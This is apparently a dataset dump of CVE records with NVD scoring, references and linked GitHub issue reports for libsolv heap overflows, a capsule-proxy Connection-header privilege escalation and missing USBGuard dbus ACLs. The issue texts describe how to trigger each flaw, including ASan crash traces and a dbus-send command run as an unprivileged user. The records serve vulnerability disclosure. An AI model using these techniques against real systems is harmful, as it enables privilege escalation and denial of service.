{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openSUSE/libsolv/issues/425" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1940" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1995" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openSUSE/libsolv/issues/425" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1940" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1995" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:libsolv:*:*:*:*:*:*:*:*", "matchCriteriaId": "C7DA98F7-E498-4C89-94F6-4A18D7BC2916", "versionEndExcluding": "0.7.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/openSUSE/libsolv/issues/425
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openSUSE", "libsolv" ]
Description: There is two heap-overflow vulnerability in function: static int resolve_dependencies (Solver *solv, int level, int disablerules, Queue *dq) at src/solver.c: line 1940 & line 1995 if (r->d == 0 || solv->decisionmap[-r->p] <= 0) // line 1940 if (solv->decisionmap[p] > 0) // line 1995 The first bug is caused by the dangerous variable “decisionmap[]”. If the value of index “-r->p” is bigger than the size of “decisionmap[]”, there will be a heap-overflow bug. Please reproduce this issue through the following PoC: /libsolvBuildDir/tools/testsolv [resolve_dependencies-1940](https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1940) If you configure CC with flag -fsanitize=address, you will get the following outputs: str2job: bad line 'update A-2-2.badarch@available' testcase_read: cannot parse command 'nall' test 1: Results differ: -install k-3-6.x86_64@available -install k-m-3-6.x86_64@available test 2: Results differ: +install c-1-1.noarch@available -install k-m-3-1.x86_64@availablestall c-1-1.noarch@available +install k-m-3-6.x86_64@available setsolverflags: unknown flag 'onlynamespacerecommendeddەsult' setsolverflags: unknown flag 'transaction' setsolverflags: unknown flag '<inline>' test 3: Results differ: -install A-1-1.no +install k-3-6.x86_64@available +install k-m-3-6.x86_64@available +problem ca7106eb info package c-1-1.noarch conflicts with k = 3-6 provided by k-3-6.x86_64 +problem ca7106eb solution 4d4bc71f allow k-1-0.x86_64@system +problem ca7106eb solution 4d4bc71f allow k-2-0.x86_64@system +problem ca7106eb solution 4d4bc71f allow k-3-0.x86_64@system +problem ca7106eb solution 86764155 deljob install name c testcase_read: cannot parse command 'solveflag>' setsolverflags: unknown flag 'yumobsol6eb' setsolverflags: unknown flag 'solution' setsolverflags: unknown flag '86764155' setsolverflags: unknown flag 'deljob' setsolverflags: unknown flag 'install' setsolverflags: unknown flag 'name' setsolverflags: unknown flag 'c' str2job: bad line 'update A-2-2.badarch@available' testcase_read: cannot parse command 'nall' test 4: \=========================================================== \==92568==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6060000021c0 at pc 0x7fab18a32a6c bp 0x7ffc16984f70 sp 0x7ffc16984f68 READ of size 4 at 0x6060000021c0 thread T0 #0 0x7fab18a32a6b in resolve_dependencies /root/Experiments/real-world/libsolv/src/solver.c:1940:21 #1 0x7fab18a17ba4 in solver_run_sat /root/Experiments/real-world/libsolv/src/solver.c:2722:15 #2 0x7fab18a4d65a in solver_solve /root/Experiments/real-world/libsolv/src/solver.c:4137:3 #3 0x4f1eea in main /root/Experiments/real-world/libsolv/tools/testsolv.c:241:8 #4 0x7fab17a29bf6 in __libc_start_main /build/glibc-S7xCS9/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41e6f9 in _start (/root/Experiments/real-world/libsolv/build/tools/testsolv+0x41e6f9) 0x6060000021c0 is located 4 bytes to the right of 60-byte region [0x606000002180,0x6060000021bc) allocated by thread T0 here: #0 0x4abe48 in calloc /root/Downloads/llvm-build/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x7fab18b86f10 in solv_calloc /root/Experiments/real-world/libsolv/src/util.c:79:9 #2 0x7fab18a0eb9a in solver_create /root/Experiments/real-world/libsolv/src/solver.c:1327:29 #3 0x7fab21fc62d4 in testcase_read /root/Experiments/real-world/libsolv/ext/testcase.c:2268:15 #4 0x4f144b in main /root/Experiments/real-world/libsolv/tools/testsolv.c:159:11 #5 0x7fab17a29bf6 in __libc_start_main /build/glibc-S7xCS9/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Experiments/real-world/libsolv/src/solver.c:1940:21 in resolve_dependencies Shadow bytes around the buggy address: 0x0c0c7fff83e0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff83f0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa 0x0c0c7fff8400: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff8410: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff8420: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa =>0x0c0c7fff8430: 00 00 00 00 00 00 00 04[fa]fa fa fa fd fd fd fd 0x0c0c7fff8440: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff8450: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa 0x0c0c7fff8460: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd 0x0c0c7fff8470: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd 0x0c0c7fff8480: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc \==92568==ABORTING The second bug is same with the above heap-overflow bug, which is caused by the dangerous variable “decisionmap[]”. The index “p” is dependent on variable “dp”, and variable “dp” is equal with pool->whatprovidesdata + r->d. If the value of index “p” is bigger than the size of “decisionmap”, there will be a heap overflow vulnerability. Our PoC file can make the value of index “p” is bigger than the size of “decisionmap”. Please reproduce this issue through the following PoC: /libsolvBuildDir/tools/testsolv [resolve_dependencies-1995](https://github.com/yangjiageng/PoC/blob/master/libsolv-PoCs/resolve_dependencies-1995) If you configure CC with flag -fsanitize=address, you will get the following outputs: testcase_read: could not open 'FuzzDir/out/A-2-2.badarch@available' test 1: Transaction summary: str2job: unknown job 'noable 0 testtags <inline>' testcase_read: system: unknown repo 'system' testcase_read: could not open 'FuzzDir/out/1' testcase_read: system: unknown repo 'system' str2job: bad line 'in' testcase_read: cannot parse command 'H¶5ޒĸ,BU[¯ğ́]H䪮ÿ̚퐩rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrro+rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrules' test 2: \=========================================================== \==122904==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000001b8 at pc 0x7f3afbc2eacd bp 0x7ffec47f9f90 sp 0x7ffec47f9f88 READ of size 4 at 0x6040000001b8 thread T0 #0 0x7f3afbc2eacc in resolve_dependencies /root/Experiments/real-world/libsolv/src/solver.c:1995:9 #1 0x7f3afbc13ba4 in solver_run_sat /root/Experiments/real-world/libsolv/src/solver.c:2722:15 #2 0x7f3afbc4965a in solver_solve /root/Experiments/real-world/libsolv/src/solver.c:4137:3 #3 0x4f1eea in main /root/Experiments/real-world/libsolv/tools/testsolv.c:241:8 #4 0x7f3afac25bf6 in __libc_start_main /build/glibc-S7xCS9/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x41e6f9 in _start (/root/Experiments/real-world/libsolv/build/tools/testsolv+0x41e6f9) 0x6040000001b8 is located 4 bytes to the right of 36-byte region [0x604000000190,0x6040000001b4) allocated by thread T0 here: #0 0x4abe48 in calloc /root/Downloads/llvm-build/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:154 #1 0x7f3afbd82f10 in solv_calloc /root/Experiments/real-world/libsolv/src/util.c:79:9 #2 0x7f3afbc0ab9a in solver_create /root/Experiments/real-world/libsolv/src/solver.c:1327:29 #3 0x7f3b051c22d4 in testcase_read /root/Experiments/real-world/libsolv/ext/testcase.c:2268:15 #4 0x4f144b in main /root/Experiments/real-world/libsolv/tools/testsolv.c:159:11 #5 0x7f3afac25bf6 in __libc_start_main /build/glibc-S7xCS9/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Experiments/real-world/libsolv/src/solver.c:1995:9 in resolve_dependencies Shadow bytes around the buggy address: 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 05 0x0c087fff8010: fa fa 00 00 00 00 02 fa fa fa 00 00 00 00 00 06 0x0c087fff8020: fa fa 00 00 00 00 00 01 fa fa fd fd fd fd fd fa =>0x0c087fff8030: fa fa 00 00 00 00 04[fa]fa fa fd fd fd fd fd fa 0x0c087fff8040: fa fa 00 00 00 00 00 07 fa fa 00 00 00 00 03 fa 0x0c087fff8050: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 01 0x0c087fff8060: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00 0x0c087fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc \==122904==ABORTING The ASAN outputs information about these overflow bug. And attacker can use this bug to achieve a DoS attack. Please reproduce and fix these two bugs.
libsolv “resolve_dependencies” function two heap-overflow vulnerability
https://api.github.com/repos/openSUSE/libsolv/issues/425/comments
7
2020-12-13T06:41:31Z
2022-03-31T12:17:40Z
https://github.com/openSUSE/libsolv/issues/425
765,075,829
425
3,222
CVE-2022-23652
2022-02-22T20:15:07.763
capsule-proxy is a reverse proxy for Capsule Operator which provides multi-tenancy in Kubernetes. In versions prior to 0.2.1 an attacker with a proper authentication mechanism may use a malicious `Connection` header to start a privilege escalation attack towards the Kubernetes API Server. This vulnerability allows for an exploit of the `cluster-admin` Role bound to `capsule-proxy`. There are no known workarounds for this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/issues/188" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/security/advisories/GHSA-9cwv-cppx-mqjm" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/commit/efe91f68ebf8a9e3d21491dc57da7b8a746415d8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/issues/188" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/clastix/capsule-proxy/security/advisories/GHSA-9cwv-cppx-mqjm" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:clastix:capsule-proxy:*:*:*:*:*:*:*:*", "matchCriteriaId": "67F30FEB-4C18-4522-9B33-D66E83DB8F13", "versionEndExcluding": "0.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/clastix/capsule-proxy/issues/188
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "clastix", "capsule-proxy" ]
A user crafting an API request directed at `capsule-proxy` can get a privilege escalation using the Service Account of the proxy itself. This is done by passing the `Impersonate-User` or `Impersonate-Group` header in the `Connection` header, using the same exploit described here: https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr > At this point, instead of impersonating the user and their permissions, the request will act as if it was from the ~~Rancher management server~~ Capsule Proxy and incorrectly return the information.
Privilege escalation vulnerability via malicious "Connection" header
https://api.github.com/repos/projectcapsule/capsule-proxy/issues/188/comments
1
2022-02-18T19:53:04Z
2022-02-20T21:45:50Z
https://github.com/projectcapsule/capsule-proxy/issues/188
1,143,674,082
188
3,223
CVE-2019-25058
2022-02-24T15:15:21.220
An issue was discovered in USBGuard before 1.1.0. On systems with the usbguard-dbus daemon running, an unprivileged user could make USBGuard allow all USB devices to be connected in the future.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/273" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/403" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/pull/531" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00010.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B2ET6DU4IA64M6TMQ4X3SG2L6TRPLDN6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3HQVTHHJFQLSWSXA7W3ZHRF72YMPI46/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4QO5J5YEWVX27QXYOGL3BDRV3KXNRQI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/273" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/403" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/pull/531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B2ET6DU4IA64M6TMQ4X3SG2L6TRPLDN6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3HQVTHHJFQLSWSXA7W3ZHRF72YMPI46/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4QO5J5YEWVX27QXYOGL3BDRV3KXNRQI/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:usbguard_project:usbguard:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D7EAA37-523F-452D-8E2C-A749E045591F", "versionEndExcluding": "1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/USBGuard/usbguard/issues/273
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "USBGuard", "usbguard" ]
Some of the methods exposed via dbus are not covered by the [current default policy](https://github.com/USBGuard/usbguard/blob/master/src/DBus/org.usbguard.policy). This includes the `getParameter` and `setParameter` methods. On a default debian install, as unprivileged user: ``` $ usbguard get-parameter InsertedDevicePolicy ERROR: IPC connect: service=usbguard: Operation not permitted $ dbus-send --system --print-reply --dest=org.usbguard /org/usbguard/Policy org.usbguard.getParameter string:"InsertedDevicePolicy" method return time=1549540531.655300 sender=:1.79383 -> destination=:1.120734 serial=97 reply_serial=2 string "apply-policy" ``` This can be fixed by adding these to the current policy configuration. However, having 2 buses and 2 ACLs makes the administration of any deployment tedious. There is always a risk of future methods to be exposed. Ideally, dbus should be the only bus exposed and the libqb bus dropped.
No default ACL on some dbus methods
https://api.github.com/repos/USBGuard/usbguard/issues/273/comments
4
2019-02-07T12:11:36Z
2022-02-14T09:54:59Z
https://github.com/USBGuard/usbguard/issues/273
407,669,808
273
3,224
CVE-2019-25058
2022-02-24T15:15:21.220
An issue was discovered in USBGuard before 1.1.0. On systems with the usbguard-dbus daemon running, an unprivileged user could make USBGuard allow all USB devices to be connected in the future.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/273" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/403" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/pull/531" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00010.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B2ET6DU4IA64M6TMQ4X3SG2L6TRPLDN6/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3HQVTHHJFQLSWSXA7W3ZHRF72YMPI46/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4QO5J5YEWVX27QXYOGL3BDRV3KXNRQI/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/273" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/issues/403" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/USBGuard/usbguard/pull/531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B2ET6DU4IA64M6TMQ4X3SG2L6TRPLDN6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/B3HQVTHHJFQLSWSXA7W3ZHRF72YMPI46/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4QO5J5YEWVX27QXYOGL3BDRV3KXNRQI/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:usbguard_project:usbguard:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D7EAA37-523F-452D-8E2C-A749E045591F", "versionEndExcluding": "1.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/USBGuard/usbguard/issues/403
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "USBGuard", "usbguard" ]
